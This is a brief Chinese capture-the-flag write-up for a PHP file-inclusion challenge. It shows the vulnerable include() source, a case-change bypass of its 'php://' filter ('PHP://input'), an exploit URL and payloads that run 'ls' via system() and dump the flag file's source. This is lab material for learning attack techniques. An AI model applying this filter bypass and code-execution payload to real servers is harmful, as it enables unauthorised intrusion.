攻防世界 Web_php_include(文件包含,php伪协议)
文件包含漏洞
参考:https://www.cnblogs.com/endust/p/11804767.html //php伪协议
1 <?php 2 show_source(__FILE__); 3 echo $_GET['hello']; 4 $page=$_GET['page']; 5 while (strstr($page, "php://")) { 6 $page=str_replace("php://", "", $page); 7 } 8 include($page); 9 ?>
过滤php://协议,但是这里可以用大小写绕过
while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); }
http://220.249.52.133:51219/?page=PHP://input
<?php system("ls"); ?> //命令执行
<?show_source("fl4gisisish3r3.php");?> //查看源码